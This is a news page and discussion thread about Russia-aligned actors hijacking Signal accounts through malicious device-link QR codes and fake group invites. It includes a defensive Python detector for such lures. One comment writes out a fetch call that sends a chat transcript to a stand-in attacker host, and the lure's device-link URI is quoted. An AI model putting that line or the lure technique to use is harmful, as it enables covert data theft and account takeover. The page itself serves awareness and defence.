February 19th, 2025

Multiple Russia-aligned threat actors actively targeting Signal Messenger

Russia-aligned threat actors are increasingly targeting Signal Messenger accounts, using malicious QR codes and phishing campaigns to exploit vulnerabilities, urging users to enhance security awareness amid evolving threats.


Google's Threat Intelligence Group has reported a significant increase in attempts by Russia-aligned threat actors to compromise Signal Messenger accounts, particularly those used by individuals of interest to Russian intelligence. This surge in activity is likely driven by the ongoing conflict in Ukraine, as adversaries seek access to sensitive communications. Signal's popularity among military personnel, journalists, and activists makes it a prime target for espionage. The primary method of attack involves exploiting Signal's "linked devices" feature, where malicious QR codes are crafted to link a victim's account to an actor-controlled instance, allowing real-time eavesdropping. Phishing campaigns have been observed, including fake group invites and tailored phishing kits that mimic trusted applications. Additionally, established threat actors have developed capabilities to steal Signal database files from devices. The report emphasizes the need for heightened awareness and security measures among users of secure messaging applications, as the threat landscape continues to evolve with increasing sophistication and frequency of attacks.

- Russia-aligned threat actors are targeting Signal Messenger accounts amid the Ukraine conflict.

- Malicious QR codes are used to exploit Signal's "linked devices" feature for eavesdropping.

- Phishing campaigns include fake group invites and tailored kits mimicking trusted applications.

- Established threat actors are also stealing Signal database files from devices.

- Users of secure messaging apps are urged to enhance their security awareness and practices.
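To make the linked-devices lure concrete, here is an added example (not code from the report, from Google, or from Signal) that triages the links found in a suspicious invite page and separates a genuine group invite from a device-link URI. It assumes the `sgnl://linkdevice?uuid=` form quoted from the report in the comments below and the `https://signal.group/` form for invite links; every sample value is a constructed placeholder.

```python
import re
from urllib.parse import urlparse, parse_qs

# Any sgnl:// or signal.group link embedded in page text, quoted or bare.
LINK_RE = re.compile(r'(?:sgnl://[^\s"\'<>]+|https://signal\.group/[^\s"\'<>]+)')


def classify_signal_link(link: str) -> str:
    """Return "group_invite", "device_link" or "other" for one link."""
    u = urlparse(link)
    if u.scheme == "https" and u.netloc == "signal.group":
        return "group_invite"          # what the lure page claims to be
    if u.scheme == "sgnl" and u.netloc.lower() == "linkdevice":
        return "device_link"           # what actually gets triggered
    return "other"


def scan_page(html: str) -> list[dict]:
    """Extract every Signal link from a page and annotate it."""
    findings = []
    for link in LINK_RE.findall(html):
        kind = classify_signal_link(link)
        entry = {"link": link, "kind": kind}
        if kind == "device_link":
            # The uuid parameter names the device that would be linked.
            entry["uuid"] = parse_qs(urlparse(link).query).get("uuid", [""])[0]
        findings.append(entry)
    return findings


def is_suspicious(html: str) -> bool:
    """A page that presents itself as a group invite but carries a
    device-link URI matches the lure described in the report."""
    return any(f["kind"] == "device_link" for f in scan_page(html))


# Constructed sample lure: promises a group, redirects to a device-link URI.
LURE = """<html><body><h1>Join the group</h1>
<script>window.location = "sgnl://linkdevice?uuid=PLACEHOLDER-UUID";</script>
</body></html>"""

# Constructed benign page that really does redirect to a group invite.
BENIGN = """<script>window.location = "https://signal.group/#PLACEHOLDER-INVITE";</script>"""

if __name__ == "__main__":
    for name, page in (("lure", LURE), ("benign", BENIGN)):
        print(name, "suspicious" if is_suspicious(page) else "clean", scan_page(page))
```

In practice the same check belongs wherever a decoded QR payload or redirect target is examined before the user acts on it.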

AI: What people are saying
The discussion surrounding the article on Signal Messenger's security vulnerabilities reveals several key themes and concerns among commenters.
  • Many users express skepticism about Signal's security, highlighting the risks associated with linked devices and phishing attacks.
  • There are suggestions for improving security measures, such as requiring manual confirmation for device linking and adding options to restrict linking additional devices.
  • Some commenters discuss the broader implications of using Signal, questioning its effectiveness in providing privacy and security.
  • Concerns are raised about the geopolitical context of the attacks, with some commenters linking the issue to larger narratives about Russia and cybersecurity.
  • Several users share resources and personal experiences related to the vulnerabilities, emphasizing the need for increased awareness and caution among Signal users.
42 comments
By @vetrom - 2 days
Signal (and basically any app) with a linked devices workflow has been risky for a while now. I touched on this last year (https://news.ycombinator.com/context?id=40303736) when Telegram was trash talking Signal -- and its implementation of linked devices has been problematic for a long time: https://eprint.iacr.org/2021/626.pdf.

I'm only surprised it took this long for an in-the-wild attack to appear in open literature.

It certainly doesn't help that Signal themselves have discounted this attack (quoted from the IACR ePrint paper):

    "We disclosed our findings to the Signal organization on October 20, 2020, and received an answer on October 28, 2020. In summary, they state that they do not treat a compromise of long-term secrets as part of their adversarial model"
By @parhamn - 2 days
One thing I'm realizing more and more (I've been building an encrypted AI chat service which is powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. I mean end of the day you can put a one-line fetch/analytics-tracker/etc on the rendering side and everything your protocol claimed to do becomes useless. That even goes further to the OS that the rendering is done on.

The last bit adds an interesting facet: even if you manage to open source the client and manage to make it verifiably buildable by the user, you still need to distribute it on the iOS store. Anything can happen in the publish process. I use iOS as the example because it's particularly tricky to load your own build of an application.

And then if you did that, you still need to do it all on the other side of the chat too, assuming it's a multi-party chat.

You can have every cute protocol known to man, the best encryption algorithms on the wire, etc., but at the end of the day it's all trust.

I mention this because these days I worry more that using something like Signal actually makes you a target for snooping under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop, I'd focus my resources on Signal users; they have the most to hide.

Sometimes it all feels pointless (besides encrypted storage).

I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

By @untech - 2 days
It is not plainly stated in the article, but as far as I understand, the first step of one of the attacks is to take the smartphone off a dead soldier’s body.
By @BrenBarn - 2 days
Is this suggesting that a single QR scan can on its own perform the device linking? If so, it seems like that's kind of the hole here, right? Like you shouldn't be able to scan a code that on its own links the device; you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)
By @1970-01-01 - 2 days
The good news is the target is targeted for a reason: it's still effective.
By @josh2600 - 2 days
There are many voices which try to tell you that Signal is compromised. Notice that all of those voices have less open-source-ness than Signal in virtually all cases.

Signal is doing its best to be a web scale company and also defend human rights. Individual dignity matters.

This is not a simple conversation.

By @anotherhue - 2 days
You can check for unexpected linked devices in the settings menu.
By @andreygrehov - 2 days
They provided some domains, but not all of them are taken. For example, signal-protect[.]host is available, kropyva[.]site is available, signal-confirm[.]site is registered in Ukraine. Some of them are registered in Russia.

Never trust a country at war—any side. Party A blames B, Party B blames A, but both have their own agenda.

By @evilfred - 2 days
"Russia-aligned threat"... so... the US?
By @aembleton - 1 day
> In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.

Missing from their recommendations: install NoScript: https://noscript.net/

By @lifeinthevoid - 1 day
They should add an option to not allow linking additional devices, if that’s feasible.
By @gck1 - 1 day
> Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.

Ironic, coming from Google, as Android is THE only OS where usage of alphanumeric passwords is nearly impossible: Android limits the length of a password to an arbitrary 16 characters, preventing usage of passphrases.

By @advisedwang - 2 days
Kind of a good sign for Signal's security that this is the best Russia has got!
By @p2detar - 2 days
Last week it was Microsoft, now Signal, who’s next?

https://www.microsoft.com/en-us/security/blog/2025/02/13/sto...

By @casenmgreen - 2 days
Can't view the article, as I am an evil Tor user.
By @mppm - about 4 hours
Am I reading this right? You can initiate device linking in Signal by clicking on an external URL? This is so stupid, I don't even have words for this. In a security-focused app you should not be able to link anything, without manually going into the devices/link menu and clicking "link new device".
By @sharpshadow - 1 day
“Russia's re-invasion of Ukraine”

Reading this for the first time, what is a “re-invasion”? Do they mean the explained cyber attack as second invasion aka “re-invasion”?

By @Shorel - 1 day
Signal should be doing something well.
By @aussieguy1234 - 1 day
Phone verification is a common method used here.

If somehow the victim's phone provider can be compromised or coerced into cooperating, the government actor can intercept the text message Signal and others use for verification and set up the victim's account on a new device.

It's very easily done if the victim is located in an authoritarian country like Russia or Iran; they can simply force the local phone provider to co-operate.

By @ge96 - 2 days
That's nice that they provided a list of bad domains.
By @Yeul - 2 days
Honestly don't use Signal for privacy or anonymity. I switched to it because it is not owned by a sycophant of Trump.

Oh how Americans make fun of the CCP but watching all the tech bros bend the knee was embarrassing.

By @4ndrewl - 2 days
"Russia-aligned threat actors" has a whole new meaning this last week.
By @karel-3d - 2 days
tl;dr: they mostly use phishing with fake Ukrainian army group invites to trick people (from the Ukrainian army) into linking the phone device to an attacker-controlled PC.

Also they try to get the actual database SQL files from Windows devices and Android devices.

By @lenerdenator - 2 days
I'd love to have more of my socializing happening on Signal. Anyone got a good way to convince the non-paranoid to use it?
By @chinathrow - 2 days
Russia fucking up the world's stuff this decade will be the material for history books. They are actively breaking Europe and almost no one seems to care.
By @whatever1 - 2 days
Impossible these are our newly minted allies
By @8bithero - 2 days
So a few days ago Elon Musk blocked all links to Signal from the X platform and now this... Could be a coincidence but the timing sure is sus.
By @paganel - 2 days
Alphabet is working in tandem with the Ukrainian SBU? Interesting choice, just as the US President has called Zelensky a dictator (and for good reason, Poroshenko, the previous Ukrainian president, has basically said the same thing a few days ago). I wonder how long the Alphabet higher-ups will allow this thing to unfold, or maybe they're not so good at reading the geopolitical tea leaves.
By @lovegrenoble - 2 days
Highly likely...
By @adultSwim - 2 days
Is this why Twitter has been blocking signal.me links? https://news.ycombinator.com/item?id=43076710
By @JohnnyLarue - 1 day
State-aligned, huh? This is the US State Department talking point equivalent of a movie poster that brags, "From the studio that brought you..."